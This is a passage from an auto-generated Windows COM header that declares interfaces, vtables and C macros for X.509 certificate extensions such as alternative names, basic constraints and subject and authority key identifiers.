#define IAlternativeNames_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IAlternativeNames_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IAlternativeNames_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IAlternativeNames_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IAlternativeNames_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IAlternativeNames_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IAlternativeNames_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IAlternativeNames_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IAlternativeNames_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IAlternativeNames_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IAlternativeNames_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IAlternativeNames_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IAlternativeNames_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IAlternativeNames_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionAlternativeNames_INTERFACE_DEFINED__
#define __IX509ExtensionAlternativeNames_INTERFACE_DEFINED__

/* interface IX509ExtensionAlternativeNames */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionAlternativeNames;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab315-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionAlternativeNames : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt IAlternativeNames *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AlternativeNames( 
            /* [retval][out] */ __RPC__deref_out_opt IAlternativeNames **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionAlternativeNamesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionAlternativeNames * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionAlternativeNames * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionAlternativeNames * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ __RPC__in_opt IAlternativeNames *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternativeNames )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [retval][out] */ __RPC__deref_out_opt IAlternativeNames **ppValue);
        
        END_INTERFACE
    } IX509ExtensionAlternativeNamesVtbl;

    interface IX509ExtensionAlternativeNames
    {
        CONST_VTBL struct IX509ExtensionAlternativeNamesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionAlternativeNames_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionAlternativeNames_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionAlternativeNames_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionAlternativeNames_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionAlternativeNames_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionAlternativeNames_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionAlternativeNames_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionAlternativeNames_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionAlternativeNames_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionAlternativeNames_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionAlternativeNames_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionAlternativeNames_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionAlternativeNames_InitializeEncode(This,pValue)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pValue) ) 

#define IX509ExtensionAlternativeNames_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionAlternativeNames_get_AlternativeNames(This,ppValue)	\
    ( (This)->lpVtbl -> get_AlternativeNames(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionAlternativeNames_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionBasicConstraints_INTERFACE_DEFINED__
#define __IX509ExtensionBasicConstraints_INTERFACE_DEFINED__

/* interface IX509ExtensionBasicConstraints */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionBasicConstraints;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab316-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionBasicConstraints : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ VARIANT_BOOL IsCA,
            /* [in] */ LONG PathLenConstraint) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IsCA( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PathLenConstraint( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionBasicConstraintsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionBasicConstraints * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionBasicConstraints * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionBasicConstraints * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ VARIANT_BOOL IsCA,
            /* [in] */ LONG PathLenConstraint);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IsCA )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PathLenConstraint )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        END_INTERFACE
    } IX509ExtensionBasicConstraintsVtbl;

    interface IX509ExtensionBasicConstraints
    {
        CONST_VTBL struct IX509ExtensionBasicConstraintsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionBasicConstraints_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionBasicConstraints_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionBasicConstraints_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionBasicConstraints_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionBasicConstraints_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionBasicConstraints_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionBasicConstraints_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionBasicConstraints_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionBasicConstraints_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionBasicConstraints_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionBasicConstraints_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionBasicConstraints_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionBasicConstraints_InitializeEncode(This,IsCA,PathLenConstraint)	\
    ( (This)->lpVtbl -> InitializeEncode(This,IsCA,PathLenConstraint) ) 

#define IX509ExtensionBasicConstraints_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionBasicConstraints_get_IsCA(This,pValue)	\
    ( (This)->lpVtbl -> get_IsCA(This,pValue) ) 

#define IX509ExtensionBasicConstraints_get_PathLenConstraint(This,pValue)	\
    ( (This)->lpVtbl -> get_PathLenConstraint(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionBasicConstraints_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionSubjectKeyIdentifier_INTERFACE_DEFINED__
#define __IX509ExtensionSubjectKeyIdentifier_INTERFACE_DEFINED__

/* interface IX509ExtensionSubjectKeyIdentifier */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionSubjectKeyIdentifier;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab317-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionSubjectKeyIdentifier : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strKeyIdentifier) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SubjectKeyIdentifier( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionSubjectKeyIdentifierVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionSubjectKeyIdentifier * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strKeyIdentifier);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SubjectKeyIdentifier )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509ExtensionSubjectKeyIdentifierVtbl;

    interface IX509ExtensionSubjectKeyIdentifier
    {
        CONST_VTBL struct IX509ExtensionSubjectKeyIdentifierVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionSubjectKeyIdentifier_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionSubjectKeyIdentifier_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionSubjectKeyIdentifier_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionSubjectKeyIdentifier_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionSubjectKeyIdentifier_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionSubjectKeyIdentifier_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionSubjectKeyIdentifier_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionSubjectKeyIdentifier_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionSubjectKeyIdentifier_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionSubjectKeyIdentifier_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionSubjectKeyIdentifier_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionSubjectKeyIdentifier_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionSubjectKeyIdentifier_InitializeEncode(This,Encoding,strKeyIdentifier)	\
    ( (This)->lpVtbl -> InitializeEncode(This,Encoding,strKeyIdentifier) ) 

#define IX509ExtensionSubjectKeyIdentifier_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionSubjectKeyIdentifier_get_SubjectKeyIdentifier(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SubjectKeyIdentifier(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionSubjectKeyIdentifier_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionAuthorityKeyIdentifier_INTERFACE_DEFINED__
#define __IX509ExtensionAuthorityKeyIdentifier_INTERFACE_DEFINED__

/* interface IX509ExtensionAuthorityKeyIdentifier */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionAuthorityKeyIdentifier;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab318-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionAuthorityKeyIdentifier : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strKeyIdentifier) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AuthorityKeyIdentifier( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionAuthorityKeyIdentifierVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionAuthorityKeyIdentifier * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
